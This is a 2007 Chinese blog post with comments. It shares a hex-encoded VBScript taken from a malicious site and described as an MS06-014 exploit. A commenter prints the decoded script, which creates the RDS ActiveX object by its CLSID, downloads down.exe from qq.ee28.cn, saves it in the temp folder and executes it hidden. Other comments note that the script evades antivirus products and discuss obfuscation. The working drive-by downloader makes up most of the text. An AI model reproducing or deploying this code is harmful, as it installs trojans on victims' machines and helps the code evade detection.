| 
	
	
		
			
		
				
						
								| Submitted by 云舒 on 2007, February 5, 6:22 AM. 
										
												技术 |  
								| 无意中发现一段VBS代码,觉得蛮好玩的,发这里保存一下: 
 代码:
 | <script language="VBScript">
 S="2020206F6E206572726F7220726573756D65206E6578740D0A737
 3733D226D64622E657865220D0A61613D226F62220D0A6161613D22
 6A65220D0A616161613D226374220D0A61616161613D22636C61220
 D0A6161616161613D2273736964220D0A616161616161613D22636C
 73220D0A61616161616161613D2269643A42443936220D0A6161616
 161616161613D22433535362D3635220D0A61616161616161616161
 3D2241332D313144220D0A61616161616161616161613D22302D393
 8220D0A6161616161616161616161613D2233412D30304330344622
 0D0A616161616161616161616161613D22433239453336220D0A6D6
 D3D224D6963220D0A6E6E3D22726F73220D0A6D6D6E6E3D226F6674
 2E58220D0A6E6E6D6D3D224D4C48220D0A6D6E6D6E3D22545450220
 D0A6E6D3D6D6E0D0A62623D224164220D0A6262623D226F64220D0A
 626262623D22622E5374220D0A62626262623D227265616D220D0A6
 7673D2267220D0A65653D2265220D0A74743D2274220D0A63633D22
 536372220D0A6363633D22697074220D0A636363633D22696E672E4
 6220D0A6363313D22696C6553220D0A636363313D22797374220D0A
 63636363313D22656D4F220D0A6363323D22626A220D0A636363323
 D22656374220D0A68683D22536865220D0A6868683D226C6C2E4170
 220D0A686868683D22706C69220D0A68686868683D2263617469220
 D0A6868686868683D226F6E220D0A6F6F3D226F220D0A6F6F6F3D227
 065220D0A6F6F6F6F3D226E220D0A536574207878787878787878203
 D20646F63756D656E742E637265617465456C656D656E7428616126
 6161612661616161290D0A78787878787878782E7365744174747269
 62757465206161616161266161616161612C20616161616161612661
 61616161616161266161616161616161612661616161616161616161
 26616161616161616161616126616161616161616161616161266161
 61616161616161616161610D0A53657420787878787878203D207878
 7878787878782E4372656174654F626A656374286D6D266E6E266D6
 D6E6E266E6E6D6D266D6E6D6E2C2222290D0A736574207878787820
 3D2078787878787878782E6372656174656F626A6563742862622662
 626226626262622662626262622C2222290D0A787878782E74797065
 203D20310D0A7878787878782E4F70656E2067672665652674742C20
 22687474703A2F2F71712E656532382E636E2F646F776E2F646F776E2
 E657865222C2046616C73650D0A7878787878782E53656E640D0A78
 7878787878783D7373730D0A20202020736574207878787878203D2
 078787878787878782E6372656174656F626A6563742863632663636
 32663636363266363312663636331266363636331266363322663636
 3322C2222290D0A2020202073657420746D70203D2078787878782E
 4765745370656369616C466F6C646572283229200D0A202020207878
 78787878783D2078787878782E4275696C645061746828746D702C7
 8787878787878290D0A20202020787878782E6F70656E0D0A2020202
 0787878782E7772697465207878787878782E726573706F6E7365426
 F64790D0A20202020787878782E73617665746F66696C65207878787
 87878782C320D0A20202020787878782E636C6F73650D0A20202020
 73657420717171203D2078787878787878782E6372656174656F626A
 65637428686826686868266868686826686868686826686868686868
 2C2222290D0A202020207171712E5368656C6C45786563757465207
 87878787878782C22222C22222C6F6F266F6F6F266F6F6F6F2C30":D
 ="EXECUTE """"":C="&CHR(&H":N=")":DO WHILE LEN(S)>1:IF ISNUMER
 IC(LEFT(S,1)) THEN D=D&C&LEFT(S,2)&N:S=MID(S,3) ELSE D=D&C&LEF
 T(S,4)&N:S=MID(S,5)
 LOOP:EXECUTE D
 
 </script>
 
 
 | 
 |  
								| 
 |   
      
        
          评论
        
      
      
         | 
 |  | 好像不能运行。汗 |  | Post by banroo on 2007, February 5, 7:55 AM 
 |  | 你运行了? 这个是刚从一个恶意网站抓出来的MS06014的利用代码,如果没补丁会下载一个木马。
 |  | Post by 云舒 on 2007, February 5, 8:10 AM 
 |  | 呵呵~还双重加密呢~以为是老外的东西~原来是国产的~ 
 on error resume next
 sss="mdb.exe"
 aa="ob"
 aaa="je"
 aaaa="ct"
 aaaaa="cla"
 aaaaaa="ssid"
 aaaaaaa="cls"
 aaaaaaaa="id:BD96"
 aaaaaaaaa="C556-65"
 aaaaaaaaaa="A3-11D"
 aaaaaaaaaaa="0-98"
 aaaaaaaaaaaa="3A-00C04F"
 aaaaaaaaaaaaa="C29E36"
 mm="Mic"
 nn="ros"
 mmnn="oft.X"
 nnmm="MLH"
 mnmn="TTP"
 nm=mn
 bb="Ad"
 bbb="od"
 bbbb="b.St"
 bbbbb="ream"
 gg="g"
 ee="e"
 tt="t"
 cc="Scr"
 ccc="ipt"
 cccc="ing.F"
 cc1="ileS"
 ccc1="yst"
 cccc1="emO"
 cc2="bj"
 ccc2="ect"
 hh="She"
 hhh="ll.Ap"
 hhhh="pli"
 hhhhh="cati"
 hhhhhh="on"
 oo="o"
 ooo="pe"
 oooo="n"
 Set xxxxxxxx = document.createElement(aa&aaa&aaaa)
 xxxxxxxx.setAttribute aaaaa&aaaaaa,
aaaaaaa&aaaaaaaa&aaaaaaaaa&aaaaaaaaaa&aaaaaaaaaaa&aaaaaaaaaaaa&aaaaaaaaaaaaa
 Set xxxxxx = xxxxxxxx.CreateObject(mm&nn&mmnn&nnmm&mnmn,"")
 set xxxx = xxxxxxxx.createobject(bb&bbb&bbbb&bbbbb,"")
 xxxx.type = 1
 xxxxxx.Open gg&ee&tt, "http://qq.ee28.cn/down/down.exe", False
 xxxxxx.Send
 xxxxxxx=sss
 set xxxxx = xxxxxxxx.createobject(cc&ccc&cccc&cc1&ccc1&cccc1&cc2&ccc2,"")
 set tmp = xxxxx.GetSpecialFolder(2)
 xxxxxxx= xxxxx.BuildPath(tmp,xxxxxxx)
 xxxx.open
 xxxx.write xxxxxx.responseBody
 xxxx.savetofile xxxxxxx,2
 xxxx.close
 set qqq = xxxxxxxx.createobject(hh&hhh&hhhh&hhhhh&hhhhhh,"")
 qqq.ShellExecute xxxxxxx,"","",oo&ooo&oooo,0
 |  | Post by 云舒姐姐 on 2007, February 5, 10:51 AM 
 |  | 哼!竟然敢取名字叫云舒姐姐!不想活了…… 
 当然好玩才贴出来的~nod32也不杀的,不知道卡巴如何。
 |  | Post by 云舒 on 2007, February 5, 2:09 PM 
 |  | 编这个的人,也蛮累的。解剖学学的好。哈。 |  | Post by 傲少 on 2007, February 6, 7:03 AM 
 |  | 呵呵,我是运行了。不过没有运行成功。 PS:我怕有问题,在虚拟机上照了张像后,才运行了。汗,白照了。
 |  | Post by banroo on 2007, February 6, 1:29 PM 
 |  | 我要学解密! |  | Post by banroo on 2007, February 6, 1:30 PM 
 |  | 脚本加密对付杀毒软件有意义,对于人来说一点意义也没有,解密太简单了。 
 混淆对于人来说是比较有效的方法。
 |  | Post by jno on 2007, February 11, 5:50 AM 
 |  | 德国的小红伞也不杀。。。没用卡巴测试。 |  | Post by lovewaz on 2007, May 15, 4:19 PM | 
     
	    
    
 |